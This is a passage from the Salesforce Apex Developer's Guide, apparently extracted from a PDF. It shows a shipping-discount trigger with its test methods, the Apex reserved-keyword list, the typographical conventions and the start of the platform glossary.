ShippingDiscount Trigger
trigger ShippingDiscount on Shipping_Invoice__C (before update) {
// Free shipping on all orders greater than $100
for(Shipping_Invoice__C myShippingInvoice : Trigger.new)
{
if((myShippingInvoice.subtotal__c >= 100.00) &&
(myShippingInvoice.ShippingDiscount__c == 0))
{
myShippingInvoice.ShippingDiscount__c =
myShippingInvoice.Shipping__c * -1;
myShippingInvoice.GrandTotal__c += myShippingInvoice.ShippingDiscount__c;
}
}
}
1906
System.assert(order1.tax__c == 6.9375,
'Order tax was not $6.9375, but was ' + order1.tax__c);
System.assert(order1.shipping__c == 4.50,
'Order shipping was not $4.50, but was ' + order1.shipping__c);
System.assert(order1.totalweight__c == 6.00,
'Order weight was not 6 but was ' + order1.totalweight__c);
System.assert(order1.grandtotal__c == 86.4375,
'Order grand total was not $86.4375 but was '
+ order1.grandtotal__c);
System.assert(order1.shippingdiscount__c == 0,
'Order shipping discount was not $0 but was '
+ order1.shippingdiscount__c);
}
// Test for updating three items at once
public static testmethod void testBulkItemUpdate(){
// Create the shipping invoice. It's a best practice to either use defaults
// or to explicitly set all values to zero so as to avoid having
// extraneous data in your test.
Shipping_Invoice__C order1 = new Shipping_Invoice__C(subtotal__c = 0,
totalweight__c = 0, grandtotal__c = 0,
ShippingDiscount__c = 0, Shipping__c = 0, tax__c = 0);
// Insert the order and populate with items.
insert Order1;
List<Item__c> list1 = new List<Item__c>();
Item__c item1 = new Item__C(Price__c = 1, weight__c = 1, quantity__c = 1,
Shipping_Invoice__C = order1.id);
Item__c item2 = new Item__C(Price__c = 2, weight__c = 2, quantity__c = 1,
Shipping_Invoice__C = order1.id);
Item__c item3 = new Item__C(Price__c = 4, weight__c = 3, quantity__c = 1,
Shipping_Invoice__C = order1.id);
list1.add(item1);
list1.add(item2);
list1.add(item3);
insert list1;
// Update the prices on the 3 items
list1[0].price__c = 10;
list1[1].price__c = 25;
list1[2].price__c = 40;
update list1;
// Access the order and assert items updated
order1 = [SELECT id, subtotal__c, tax__c, shipping__c, totalweight__c,
grandtotal__c, shippingdiscount__c
FROM Shipping_Invoice__C
WHERE Id = :order1.Id];
System.assert(order1.subtotal__c == 75,
'Order subtotal was not $75, but was '+ order1.subtotal__c);
System.assert(order1.tax__c == 6.9375,
'Order tax was not $6.9375, but was ' + order1.tax__c);
1907
System.assert(order1.shipping__c == 4.50,
'Order shipping was not $4.50, but was '
+ order1.shipping__c);
System.assert(order1.totalweight__c == 6.00,
'Order weight was not 6 but was ' + order1.totalweight__c);
System.assert(order1.grandtotal__c == 86.4375,
'Order grand total was not $86.4375 but was '
+ order1.grandtotal__c);
System.assert(order1.shippingdiscount__c == 0,
'Order shipping discount was not $0 but was '
+ order1.shippingdiscount__c);
}
// Test for deleting items
public static testmethod void testBulkItemDelete(){
// Create the shipping invoice. It's a best practice to either use defaults
// or to explicitly set all values to zero so as to avoid having
// extraneous data in your test.
Shipping_Invoice__C order1 = new Shipping_Invoice__C(subtotal__c = 0,
totalweight__c = 0, grandtotal__c = 0,
ShippingDiscount__c = 0, Shipping__c = 0, tax__c = 0);
// Insert the order and populate with items
insert Order1;
List<Item__c> list1 = new List<Item__c>();
Item__c item1 = new Item__C(Price__c = 10, weight__c = 1, quantity__c = 1,
Shipping_Invoice__C = order1.id);
Item__c item2 = new Item__C(Price__c = 25, weight__c = 2, quantity__c = 1,
Shipping_Invoice__C = order1.id);
Item__c item3 = new Item__C(Price__c = 40, weight__c = 3, quantity__c = 1,
Shipping_Invoice__C = order1.id);
Item__c itemA = new Item__C(Price__c = 1, weight__c = 3, quantity__c = 1,
Shipping_Invoice__C = order1.id);
Item__c itemB = new Item__C(Price__c = 1, weight__c = 3, quantity__c = 1,
Shipping_Invoice__C = order1.id);
Item__c itemC = new Item__C(Price__c = 1, weight__c = 3, quantity__c = 1,
Shipping_Invoice__C = order1.id);
Item__c itemD = new Item__C(Price__c = 1, weight__c = 3, quantity__c = 1,
Shipping_Invoice__C = order1.id);
list1.add(item1);
list1.add(item2);
list1.add(item3);
list1.add(itemA);
list1.add(itemB);
list1.add(itemC);
list1.add(itemD);
insert list1;
// Seven items are now in the shipping invoice.
// The following deletes four of them.
List<Item__c> list2 = new List<Item__c>();
list2.add(itemA);
1908
list2.add(itemB);
list2.add(itemC);
list2.add(itemD);
delete list2;
// Retrieve the order and verify the deletion
order1 = [SELECT id, subtotal__c, tax__c, shipping__c, totalweight__c,
grandtotal__c, shippingdiscount__c
FROM Shipping_Invoice__C
WHERE Id = :order1.Id];
System.assert(order1.subtotal__c == 75,
'Order subtotal was not $75, but was '+ order1.subtotal__c);
System.assert(order1.tax__c == 6.9375,
'Order tax was not $6.9375, but was ' + order1.tax__c);
System.assert(order1.shipping__c == 4.50,
'Order shipping was not $4.50, but was ' + order1.shipping__c);
System.assert(order1.totalweight__c == 6.00,
'Order weight was not 6 but was ' + order1.totalweight__c);
System.assert(order1.grandtotal__c == 86.4375,
'Order grand total was not $86.4375 but was '
+ order1.grandtotal__c);
System.assert(order1.shippingdiscount__c == 0,
'Order shipping discount was not $0 but was '
+ order1.shippingdiscount__c);
}
// Testing free shipping
public static testmethod void testFreeShipping(){
// Create the shipping invoice. It's a best practice to either use defaults
// or to explicitly set all values to zero so as to avoid having
// extraneous data in your test.
Shipping_Invoice__C order1 = new Shipping_Invoice__C(subtotal__c = 0,
totalweight__c = 0, grandtotal__c = 0,
ShippingDiscount__c = 0, Shipping__c = 0, tax__c = 0);
// Insert the order and populate with items.
insert Order1;
List<Item__c> list1 = new List<Item__c>();
Item__c item1 = new Item__C(Price__c = 10, weight__c = 1,
quantity__c = 1, Shipping_Invoice__C = order1.id);
Item__c item2 = new Item__C(Price__c = 25, weight__c = 2,
quantity__c = 1, Shipping_Invoice__C = order1.id);
Item__c item3 = new Item__C(Price__c = 40, weight__c = 3,
quantity__c = 1, Shipping_Invoice__C = order1.id);
list1.add(item1);
list1.add(item2);
list1.add(item3);
insert list1;
// Retrieve the order and verify free shipping not applicable
order1 = [SELECT id, subtotal__c, tax__c, shipping__c, totalweight__c,
grandtotal__c, shippingdiscount__c
FROM Shipping_Invoice__C
1909
WHERE Id = :order1.Id];
// Free shipping not available on $75 orders
System.assert(order1.subtotal__c == 75,
'Order subtotal was not $75, but was '+ order1.subtotal__c);
System.assert(order1.tax__c == 6.9375,
'Order tax was not $6.9375, but was ' + order1.tax__c);
System.assert(order1.shipping__c == 4.50,
'Order shipping was not $4.50, but was ' + order1.shipping__c);
System.assert(order1.totalweight__c == 6.00,
'Order weight was not 6 but was ' + order1.totalweight__c);
System.assert(order1.grandtotal__c == 86.4375,
'Order grand total was not $86.4375 but was '
+ order1.grandtotal__c);
System.assert(order1.shippingdiscount__c == 0,
'Order shipping discount was not $0 but was '
+ order1.shippingdiscount__c);
// Add items to increase subtotal
item1 = new Item__C(Price__c = 25, weight__c = 20, quantity__c = 1,
Shipping_Invoice__C = order1.id);
insert item1;
// Retrieve the order and verify free shipping is applicable
order1 = [SELECT id, subtotal__c, tax__c, shipping__c, totalweight__c,
grandtotal__c, shippingdiscount__c
FROM Shipping_Invoice__C
WHERE Id = :order1.Id];
// Order total is now at $100, so free shipping should be enabled
System.assert(order1.subtotal__c == 100,
'Order subtotal was not $100, but was '+ order1.subtotal__c);
System.assert(order1.tax__c == 9.25,
'Order tax was not $9.25, but was ' + order1.tax__c);
System.assert(order1.shipping__c == 19.50,
'Order shipping was not $19.50, but was '
+ order1.shipping__c);
System.assert(order1.totalweight__c == 26.00,
'Order weight was not 26 but was ' + order1.totalweight__c);
System.assert(order1.grandtotal__c == 109.25,
'Order grand total was not $86.4375 but was '
+ order1.grandtotal__c);
System.assert(order1.shippingdiscount__c == -19.50,
'Order shipping discount was not -$19.50 but was '
+ order1.shippingdiscount__c);
}
// Negative testing for inserting bad input
public static testmethod void testNegativeTests(){
// Create the shipping invoice. It's a best practice to either use defaults
// or to explicitly set all values to zero so as to avoid having
// extraneous data in your test.
Shipping_Invoice__C order1 = new Shipping_Invoice__C(subtotal__c = 0,
1910
totalweight__c = 0, grandtotal__c = 0,
ShippingDiscount__c = 0, Shipping__c = 0, tax__c = 0);
// Insert the order and populate with items.
insert Order1;
Item__c item1 = new Item__C(Price__c = -10, weight__c = 1, quantity__c = 1,
Shipping_Invoice__C = order1.id);
Item__c item2 = new Item__C(Price__c = 25, weight__c = -2, quantity__c = 1,
Shipping_Invoice__C = order1.id);
Item__c item3 = new Item__C(Price__c = 40, weight__c = 3, quantity__c = -1,
Shipping_Invoice__C = order1.id);
Item__c item4 = new Item__C(Price__c = 40, weight__c = 3, quantity__c = 0,
Shipping_Invoice__C = order1.id);
try{
insert item1;
}
catch(Exception e)
{
system.assert(e.getMessage().contains('Price must be non-negative'),
'Price was negative but was not caught');
}
try{
insert item2;
}
catch(Exception e)
{
system.assert(e.getMessage().contains('Weight must be non-negative'),
'Weight was negative but was not caught');
}
try{
insert item3;
}
catch(Exception e)
{
system.assert(e.getMessage().contains('Quantity must be positive'),
'Quantity was negative but was not caught');
}
try{
insert item4;
}
catch(Exception e)
{
system.assert(e.getMessage().contains('Quantity must be positive'),
'Quantity was zero but was not caught');
}
}
}
1911
having*
retrieve*
activate*
hint*
return
and
if
returning*
any*
implements
rollback
array
import*
savepoint
as
inner*
search*
asc
insert
select
autonomous*
instanceof
set
begin*
interface
short*
bigdecimal*
into*
sort
blob
int
stat*
break
join*
static
bulk
last_90_days
super
by
last_month
switch*
byte*
last_n_days
synchronized*
case*
last_week
system
cast*
like
testmethod
catch
limit
then*
char*
list
this
class
long
this_month*
collect*
loop*
this_week
commit
map
throw
const*
merge
today
continue
new
tolabel
convertcurrency
next_90_days
tomorrow
decimal
next_month
transaction*
1912
Reserved Keywords
default*
next_n_days
trigger
delete
next_week
true
desc
not
try
do
null
type*
else
nulls
undelete
end*
number*
update
enum
object*
upsert
exception
of*
using
exit*
on
virtual
export*
or
webservice
extends
outer*
when*
false
override
where
final
package
while
finally
parallel*
yesterday
float*
pragma*
for
private
from
protected
future
public
global
goto*
group*
The following are special types of keywords that aren't reserved words and can be used as identifiers.
after
before
count
excludes
first
includes
last
order
sharing
with
1913
Description
Courier font
In descriptions of syntax, monospace font indicates items that you should type as shown,
except for brackets. For example:
Public class HelloWorld
Italics
In descriptions of syntax, italics represent variables. You supply the actual value. In the following
example, three values need to be supplied: datatype variable_name [ = value];
If the syntax is bold and italic, the text represents a code element that needs a value supplied
by you, such as a class name or variable value:
public static class YourClassHere { ... }
In code samples and syntax descriptions, bold courier font emphasizes a portion of the code
or syntax.
<>
In descriptions of syntax, less-than and greater-than symbols (< >) are typed exactly as shown.
<apex:pageBlockTable value="{!account.Contacts}" var="contact">
<apex:column value="{!contact.Name}"/>
<apex:column value="{!contact.MailingCity}"/>
<apex:column value="{!contact.Phone}"/>
</apex:pageBlockTable>
{}
[]
1914
Convention
Description
In descriptions of syntax, the pipe sign means or. You can do one of the following (not all).
In the following example, you can create a new unpopulated set in one of two ways, or you
can populate the set:
Set<data_type> set_name
[= new Set<data_type>();] |
[= new Set<data_type{value [, value2. . .] };] |
;
1915
GLOSSARY
A |B |C |D |E |F |G |H |I |J | L |M |N |O |P |Q |R |S |T |U |V |W |X |Y |Z
A
Administrator (System Administrator)
One or more individuals in your organization who can configure and customize the application. Users assigned to the System
Administrator profile have administrator privileges.
AJAX Toolkit
A JavaScript wrapper around the API that allows you to execute any API call and access any object you have permission to view from
within JavaScript code. For more information, see the AJAX Toolkit Developer's Guide.
Anti-Join
An anti-join is a subquery on another object in a NOT IN clause in a SOQL query. You can use anti-joins to create advanced queries,
such as getting all accounts that do not have any open opportunities. See also Semi-Join.
Anonymous Block, Apex
Apex code that does not get stored in Salesforce, but that can be compiled and executed through the use of the
ExecuteAnonymousResult() API call, or the equivalent in the AJAX Toolkit.
Apex
Apex is a strongly typed, object-oriented programming language that allows developers to execute flow and transaction control
statements on the Force.com platform server in conjunction with calls to the Force.com API. Using syntax that looks like Java and
acts like database stored procedures, Apex enables developers to add business logic to most system events, including button clicks,
related record updates, and Visualforce pages. Apex code can be initiated by Web service requests and from triggers on objects.
Apex-Managed Sharing
Enables developers to programmatically manipulate sharing to support their applications behavior. Apex-managed sharing is only
available for custom objects.
Apex Page
See Visualforce Page.
App
Short for application. A collection of components such as tabs, reports, dashboards, and Visualforce pages that address a specific
business need. Salesforce provides standard apps such as Sales and Call Center. You can customize the standard apps to match the
way you work. In addition, you can package an app and upload it to the AppExchange along with related components such as
custom fields, custom tabs, and custom objects. Then, you can make the app available to other Salesforce users from the AppExchange.
AppExchange
The AppExchange is a sharing interface from Salesforce that allows you to browse and share apps and services for the Force.com
platform.
Application Programming Interface (API)
The interface that a computer system, library, or application provides to allow other computer programs to request services from it
and exchange data.
Approval Process
An approval process is an automated process your organization can use to approve records in Salesforce. An approval process
specifies the steps necessary for a record to be approved and who must approve it at each step. A step can apply to all records
1916
Glossary
included in the process, or just records that meet certain administrator-defined criteria. An approval process also specifies the actions
to take when a record is approved, rejected, recalled, or first submitted for approval.
Asynchronous Calls
A call that does not return results immediately because the operation may take a long time. Calls in the Metadata API and Bulk API
are asynchronous.
B
Batch Apex
The ability to perform long, complex operations on many records at a scheduled time using Apex.
Beta, Managed Package
In the context of managed packages, a beta managed package is an early version of a managed package distributed to a sampling
of your intended audience to test it.
Bulk API
The REST-based Bulk API is optimized for processing large sets of data. It allows you to query, insert, update, upsert, or delete a large
number of records asynchronously by submitting a number of batches which are processed in the background by Salesforce. See
also SOAP API.
C
Callout, Apex
An Apex callout enables you to tightly integrate your Apex with an external service by making a call to an external Web service or
sending a HTTP request from Apex code and then receiving the response.
Child Relationship
A relationship that has been defined on an sObject that references another sObject as the one side of a one-to-many relationship.
For example, contacts, opportunities, and tasks have child relationships with accounts.
See also sObject.
Class, Apex
A template or blueprint from which Apex objects are created. Classes consist of other classes, user-defined methods, variables,
exception types, and static initialization code. In most cases, Apex classes are modeled on their counterparts in Java.
Client App
An app that runs outside the Salesforce user interface and uses only the Force.com API or Bulk API. It typically runs on a desktop or
mobile device. These apps treat the platform as a data source, using the development model of whatever tool and platform for
which they are designed.
Code Coverage
A way to identify which lines of code are exercised by a set of unit tests, and which are not. This helps you identify sections of code
that are completely untested and therefore at greatest risk of containing a bug or introducing a regression in the future.
Component, Metadata
A component is an instance of a metadata type in the Metadata API. For example, CustomObject is a metadata type for custom
objects, and the MyCustomObject__c component is an instance of a custom object. A component is described in an XML file
and it can be deployed or retrieved using the Metadata API, or tools built on top of it, such as the Force.com IDE or the Force.com
Migration Tool.
1917
Glossary
Component, Visualforce
Something that can be added to a Visualforce page with a set of tags, for example, <apex:detail>. Visualforce includes a
number of standard components, or you can create your own custom components.
Component Reference, Visualforce
A description of the standard and custom Visualforce components that are available in your organization. You can access the
component library from the development footer of any Visualforce page or the Visualforce Developer's Guide.
Composite App
An app that combines native platform functionality with one or more external Web services, such as Yahoo! Maps. Composite apps
allow for more flexibility and integration with other services, but may require running and managing external code. See also Client
App and Native App.
Controller, Visualforce
An Apex class that provides a Visualforce page with the data and business logic it needs to run. Visualforce pages can use the standard
controllers that come by default with every standard or custom object, or they can use custom controllers.
Controller Extension
A controller extension is an Apex class that extends the functionality of a standard or custom controller.
Cookie
Client-specific data used by some Web applications to store user and session-specific information. Salesforce issues a session cookie
only to record encrypted authentication information for the duration of a specific session.
Custom App
See App.
Custom Controller
A custom controller is an Apex class that implements all of the logic for a page without leveraging a standard controller. Use custom
controllers when you want your Visualforce page to run entirely in system mode, which does not enforce the permissions and
field-level security of the current user.
Custom Field
A field that can be added in addition to the standard fields to customize Salesforce for your organizations needs.
Custom Links
Custom links are URLs defined by administrators to integrate your Salesforce data with external websites and back-office systems.
Formerly known as Web links.
Custom Object
Custom records that allow you to store information unique to your organization.
Custom Settings
Custom settings are similar to custom objects and enable application developers to create custom sets of data, as well as create and
associate custom data for an organization, profile, or specific user. All custom settings data is exposed in the application cache, which
enables efficient access without the cost of repeated queries to the database. This data can then be used by formula fields, validation
rules, Apex, and the SOAP API.
See also Hierarchy Custom Settings and List Custom Settings.
D
Database
An organized collection of information. The underlying architecture of the Force.com platform includes a database where your data
is stored.
1918
Glossary
Database Table
A list of information, presented with rows and columns, about the person, thing, or concept you want to track. See also Object.
Data Loader
A Force.com platform tool used to import and export data from your Salesforce organization.
Data Manipulation Language (DML)
An Apex method or operation that inserts, updates, or deletes records from the Force.com platform database.
Data State
The structure of data in an object at a particular point in time.
Date Literal
A keyword in a SOQL or SOSL query that represents a relative range of time such as last month or next year.
Decimal Places
Parameter for number, currency, and percent custom fields that indicates the total number of digits you can enter to the right of a
decimal point, for example, 4.98 for an entry of 2. Note that the system rounds the decimal numbers you enter, if necessary. For
example, if you enter 4.986 in a field with Decimal Places of 2, the number rounds to 4.99. Salesforce uses the round half-up
rounding algorithm. Half-way values are always rounded up. For example, 1.45 is rounded to 1.5. 1.45 is rounded to 1.5.
Dependency
A relationship where one object's existence depends on that of another. There are a number of different kinds of dependencies
including mandatory fields, dependent objects (parent-child), file inclusion (referenced images, for example), and ordering
dependencies (when one object must be deployed before another object).
Dependent Field
Any custom picklist or multi-select picklist field that displays available values based on the value selected in its corresponding
controlling field.
Deploy
To move functionality from an inactive state to active. For example, when developing new features in the Salesforce user interface,
you must select the Deployed option to make the functionality visible to other users.
The process by which an application or other functionality is moved from development to production.
To move metadata components from a local file system to a Salesforce organization.
For installed apps, deployment makes any custom objects in the app available to users in your organization. Before a custom object
is deployed, it is only available to administrators and any users with the Customize Application permission.
Deprecated Component
A developer may decide to refine the functionality in a managed package over time as the requirements evolve. This may involve
redesigning some of the components in the managed package. Developers cannot delete some components in a Managed - Released
package, but they can deprecate a component in a later package version so that new subscribers do not receive the component,
while the component continues to function for existing subscribers and API integrations.
Detail
A page that displays information about a single object record. The detail page of a record allows you to view the information, whereas
the edit page allows you to modify it.
A term used in reports to distinguish between summary information and inclusion of all column data for all information in a report.
You can toggle the Show Details/Hide Details button to view and hide report detail information.
Developer Edition
A free, fully-functional Salesforce organization designed for developers to extend, integrate, and develop with the Force.com platform.
Developer Edition accounts are available on developer.salesforce.com.
1919
Glossary
Salesforce Developers
The Salesforce Developers website at developer.salesforce.com provides a full range of resources for platform developers, including
sample code, toolkits, an online developer community, and the ability to obtain limited Force.com platform environments.
Development Environment
A Salesforce organization where you can make configuration changes that will not affect users on the production organization. There
are two kinds of development environments, sandboxes and Developer Edition organizations.
E
Email Alert
Email alerts are workflow and approval actions that are generated using an email template by a workflow rule or approval process
and sent to designated recipients, either Salesforce users or others.
Email Template
A form email that communicates a standard message, such as a welcome letter to new employees or an acknowledgement that a
customer service request has been received. Email templates can be personalized with merge fields, and can be written in text,
HTML, or custom format.
Enterprise Edition
A Salesforce edition designed for larger, more complex businesses.
Enterprise WSDL
A strongly-typed WSDL for customers who want to build an integration with their Salesforce organization only, or for partners who
are using tools like Tibco or webMethods to build integrations that require strong typecasting. The downside of the Enterprise WSDL
is that it only works with the schema of a single Salesforce organization because it is bound to all of the unique objects and fields
that exist in that organization's data model.
Entity Relationship Diagram (ERD)
A data modeling tool that helps you organize your data into entities (or objects, as they are called in the Force.com platform) and
define the relationships between them. ERD diagrams for key Salesforce objects are published in the SOAP API Developer's Guide.
Enumeration Field
An enumeration is the WSDL equivalent of a picklist field. The valid values of the field are restricted to a strict set of possible values,
all having the same data type.
F
Facet
A child of another Visualforce component that allows you to override an area of the rendered parent with the contents of the facet.
Field
A part of an object that holds a specific piece of information, such as a text or currency value.
Field Dependency
A filter that allows you to change the contents of a picklist based on the value of another field.
Field-Level Security
Settings that determine whether fields are hidden, visible, read only, or editable for users. Available in Enterprise, Unlimited,
Performance, and Developer Editions only.
Force.com
The Salesforce platform for building applications in the cloud. Force.com combines a powerful user interface, operating system, and
database to allow you to customize and deploy applications in the cloud for your entire enterprise.
1920
Glossary
Force.com IDE
An Eclipse plug-in that allows developers to manage, author, debug and deploy Force.com applications in the Eclipse development
environment.
Force.com Migration Tool
A toolkit that allows you to write an Apache Ant build script for migrating Force.com components between a local file system and
a Salesforce organization.
Foreign Key
A field whose value is the same as the primary key of another table. You can think of a foreign key as a copy of a primary key from
another table. A relationship is made between two tables by matching the values of the foreign key in one table with the values of
the primary key in another.
G
Getter Methods
Methods that enable developers to display database and other computed values in page markup.
Methods that return values. See also Setter Methods.
Global Variable
A special merge field that you can use to reference data in your organization.
A method access modifier for any method that needs to be referenced outside of the application, either in the SOAP API or by other
Apex code.
Governor Limits
Apex execution limits that prevent developers who write inefficient code from monopolizing the resources of other Salesforce users.
Gregorian Year
A calendar based on a 12-month structure used throughout much of the world.
H
Hierarchy Custom Settings
A type of custom setting that uses a built-in hierarchical logic that lets you personalize settings for specific profiles or users. The
hierarchy logic checks the organization, profile, and user settings for the current user and returns the most specific, or lowest, value.
In the hierarchy, settings for an organization are overridden by profile settings, which, in turn, are overridden by user settings.
HTTP Debugger
An application that can be used to identify and inspect SOAP requests that are sent from the AJAX Toolkit. They behave as proxy
servers running on your local machine and allow you to inspect and author individual requests.
I
ID
See Salesforce Record ID.
IdeaExchange
A forum where Salesforce customers can suggest new product concepts, promote favorite enhancements, interact with product
managers and other customers, and preview what Salesforce is planning to deliver in future releases. Visit IdeaExchange at
ideas.salesforce.com.
1921
Glossary
Import Wizard
A tool for importing data into your Salesforce organization, accessible from Setup.
Instance
The cluster of software and hardware represented as a single logical server that hosts an organization's data and runs their applications.
The Force.com platform runs on multiple instances, but data for any single organization is always consolidated on a single instance.
Integrated Development Environment (IDE)
A software application that provides comprehensive facilities for software developers including a source code editor, testing and
debugging tools, and integration with source code control systems.
Integration User
A Salesforce user defined solely for client apps or integrations. Also referred to as the logged-in user in a SOAP API context.
ISO Code
The International Organization for Standardization country code, which represents each country by two letters.
J
Junction Object
A custom object with two master-detail relationships. Using a custom junction object, you can model a many-to-many relationship
between two objects. For example, you may have a custom object called Bug that relates to the standard case object such that a
bug could be related to multiple cases and a case could also be related to multiple bugs.
L
Length
Parameter for custom text fields that specifies the maximum number of characters (up to 255) that a user can enter in the field.
Parameter for number, currency, and percent fields that specifies the number of digits you can enter to the left of the decimal point,
for example, 123.98 for an entry of 3.
List Custom Settings
A type of custom setting that provides a reusable set of static data that can be accessed across your organization. If you use a particular
set of data frequently within your application, putting that data in a list custom setting streamlines access to it. Data in list settings
does not vary with profile or user, but is available organization-wide. Examples of list data include two-letter state abbreviations,
international dialing prefixes, and catalog numbers for products. Because the data is cached, access is low-cost and efficient: you
don't have to use SOQL queries that count against your governor limits.
List View
A list display of items (for example, accounts or contacts) based on specific criteria. Salesforce provides some predefined views.
In the Agent console, the list view is the top frame that displays a list view of records based on specific criteria. The list views you
can select to display in the console are the same list views defined on the tabs of other objects. You cannot create a list view within
the console.
Local Name
The value stored for the field in the users or accounts language. The local name for a field is associated with the standard name for
that field.
Locale
The country or geographic region in which the user is located. The setting affects the format of date and number fields, for example,
dates in the English (United States) locale display as 06/30/2000 and as 30/06/2000 in the English (United Kingdom) locale.
1922
Glossary
In Professional, Enterprise, Unlimited, Performance, and Developer Edition organizations, a users individual Locale setting overrides
the organizations Default Locale setting. In Personal and Group Editions, the organization-level locale field is called Locale,
not Default Locale.
Long Text Area
Data type of custom field that allows entry of up to 32,000 characters on separate lines.
Lookup Relationship
A relationship between two records so you can associate records with each other. For example, cases have a lookup relationship
with assets that lets you associate a particular asset with a case. On one side of the relationship, a lookup field allows users to click
a lookup icon and select another record from a popup window. On the associated record, you can then display a related list to show
all of the records that have been linked to it. If a lookup field references a record that has been deleted, by default Salesforce clears
the lookup field. Alternatively, you can prevent records from being deleted if theyre in a lookup relationship.
M
Managed Package
A collection of application components that is posted as a unit on the AppExchange and associated with a namespace and possibly
a License Management Organization. To support upgrades, a package must be managed. An organization can create a single
managed package that can be downloaded and installed by many different organizations. Managed packages differ from unmanaged
packages by having some locked components, allowing the managed package to be upgraded later. Unmanaged packages do not
include locked components and cannot be upgraded. In addition, managed packages obfuscate certain components (like Apex) on
subscribing organizations to protect the intellectual property of the developer.
Manual Sharing
Record-level access rules that allow record owners to give read and edit permissions to other users who might not have access to
the record any other way.
Many-to-Many Relationship
A relationship where each side of the relationship can have many children on the other side. Many-to-many relationships are
implemented through the use of junction objects.
Master-Detail Relationship
A relationship between two different types of records that associates the records with each other. For example, accounts have a
master-detail relationship with opportunities. This type of relationship affects record deletion, security, and makes the lookup
relationship field required on the page layout.
Metadata
Information about the structure, appearance, and functionality of an organization and any of its parts. Force.com uses XML to describe
metadata.
Metadata-Driven Development
An app development model that allows apps to be defined as declarative blueprints, with no code required. Apps built on the
platformtheir data models, objects, forms, workflows, and moreare defined by metadata.
Metadata WSDL
A WSDL for users who want to use the Force.com Metadata API calls.
Multitenancy
An application model where all users and apps share a single, common infrastructure and code base.
MVC (Model-View-Controller)
A design paradigm that deconstructs applications into components that represent data (the model), ways of displaying that data
in a user interface (the view), and ways of manipulating that data with business logic (the controller).
1923
Glossary
N
Namespace
In a packaging context, a one- to 15-character alphanumeric identifier that distinguishes your package and its contents from packages
of other developers onAppExchange, similar to a domain name. Salesforce automatically prepends your namespace prefix, followed
by two underscores (__), to all unique component names in your Salesforce organization.
Native App
An app that is built exclusively with setup (metadata) configuration on Force.com. Native apps do not require any external services
or infrastructure.
O
Object
An object allows you to store information in your Salesforce organization. The object is the overall definition of the type of information
you are storing. For example, the case object allow you to store information regarding customer inquiries. For each object, your
organization will have multiple records that store the information about specific instances of that type of data. For example, you
might have a case record to store the information about Joe Smith's training inquiry and another case record to store the information
about Mary Johnson's configuration issue.
Object-Level Help
Custom help text that you can provide for any custom object. It displays on custom object record home (overview), detail, and edit
pages, as well as list views and related lists.
Object-Level Security
Settings that allow an administrator to hide whole objects from users so that they don't know that type of data exists. Object-level
security is specified with object permissions.
One-to-Many Relationship
A relationship in which a single object is related to many other objects. For example, an account may have one or more related
contacts.
Organization
A deployment of Salesforce with a defined set of licensed users. An organization is the virtual space provided to an individual customer
of Salesforce. Your organization includes all of your data and applications, and is separate from all other organizations.
Organization-Wide Defaults
Settings that allow you to specify the baseline level of data access that a user has in your organization. For example, you can set
organization-wide defaults so that any user can see any record of a particular object that is enabled via their object permissions, but
they need extra permissions to edit one.
Outbound Call
Any call that originates from a user to a number outside of a call center in Salesforce CRM Call Center.
Outbound Message
An outbound message is a workflow, approval, or milestone action that sends the information you specify to an endpoint you
designate, such as an external service. An outbound message sends the data in the specified fields in the form of a SOAP message
to the endpoint. Outbound messaging is configured in the Salesforce setup menu. Then you must configure the external endpoint.
You can create a listener for the messages using the SOAP API.
Owner
Individual user to which a record (for example, a contact or case) is assigned.
1924
Glossary
P
PaaS
See Platform as a Service.
Package
A group of Force.com components and applications that are made available to other organizations through the AppExchange. You
use packages to bundle an app along with any related components so that you can upload them to AppExchange together.
Package Dependency
This is created when one component references another component, permission, or preference that is required for the component
to be valid. Components can include but are not limited to:
Standard or custom fields
Standard or custom objects
Visualforce pages
Apex code
Permissions and preferences can include but are not limited to:
Divisions
Multicurrency
Record types
Package Installation
Installation incorporates the contents of a package into your Salesforce organization. A package on the AppExchange can include
an app, a component, or a combination of the two. After you install a package, you may need to deploy components in the package
to make it generally available to the users in your organization.
Package Version
A package version is a number that identifies the set of components uploaded in a package. The version number has the format
majorNumber.minorNumber.patchNumber (for example, 2.1.3). The major and minor numbers increase to a chosen
value during every major release. The patchNumber is generated and updated only for a patch release.
Unmanaged packages are not upgradeable, so each package version is simply a set of components for distribution. A package version
has more significance for managed packages. Packages can exhibit different behavior for different versions. Publishers can use
package versions to evolve the components in their managed packages gracefully by releasing subsequent package versions without
breaking existing customer integrations using the package. See also Patch and Patch Development Organization.
Partner WSDL
A loosely-typed WSDL for customers, partners, and ISVs who want to build an integration or an AppExchange app that can work
across multiple Salesforce organizations. With this WSDL, the developer is responsible for marshaling data in the correct object
representation, which typically involves editing the XML. However, the developer is also freed from being dependent on any particular
data model or Salesforce organization. Contrast this with the Enterprise WSDL, which is strongly typed.
Patch
A patch enables a developer to change the functionality of existing components in a managed package, while ensuring subscribing
organizations that there are no visible behavior changes to the package. For example, you can add new variables or change the
body of an Apex class, but you may not add, deprecate, or remove any of its methods. Patches are tracked by a patchNumber
appended to every package version. See also Patch Development Organization and Package Version.
Patch Development Organization
The organization where patch versions are developed, maintained, and uploaded. Patch development organizations are created
automatically for a developer organization when they request to create a patch. See also Patch and Package Version.
1925
Glossary
Personal Edition
Product designed for individual sales representatives and single users.
Platform as a Service (PaaS)
An environment where developers use programming tools offered by a service provider to create applications and deploy them in
a cloud. The application is hosted as a service and provided to customers via the Internet. The PaaS vendor provides an API for
creating and extending specialized applications. The PaaS vendor also takes responsibility for the daily maintenance, operation, and
support of the deployed application and each customer's data. The service alleviates the need for programmers to install, configure,
and maintain the applications on their own hardware, software, and related IT resources. Services can be delivered using the PaaS
environment to any market segment.
Platform Edition
A Salesforce edition based on Enterprise, Unlimited, or Performance Edition that does not include any of the standard Salesforce
CRM apps, such as Sales or Service & Support.
Primary Key
A relational database concept. Each table in a relational database has a field in which the data value uniquely identifies the record.
This field is called the primary key. The relationship is made between two tables by matching the values of the foreign key in one
table with the values of the primary key in another.
Production Organization
A Salesforce organization that has live users accessing data.
Professional Edition
A Salesforce edition designed for businesses who need full-featured CRM functionality.
Prototype
The classes, methods and variables that are available to other Apex code.
Q
Query Locator
A parameter returned from the query() or queryMore() API call that specifies the index of the last result record that was
returned.
Query String Parameter
A name-value pair that's included in a URL, typically after a '?' character. For example:
http://na1.salesforce.com/001/e?name=value
R
Record
A single instance of a Salesforce object. For example, John Jones might be the name of a contact record.
Record ID
See Salesforce Record ID.
Record-Level Security
A method of controlling data in which you can allow a particular user to view and edit an object, but then restrict the records that
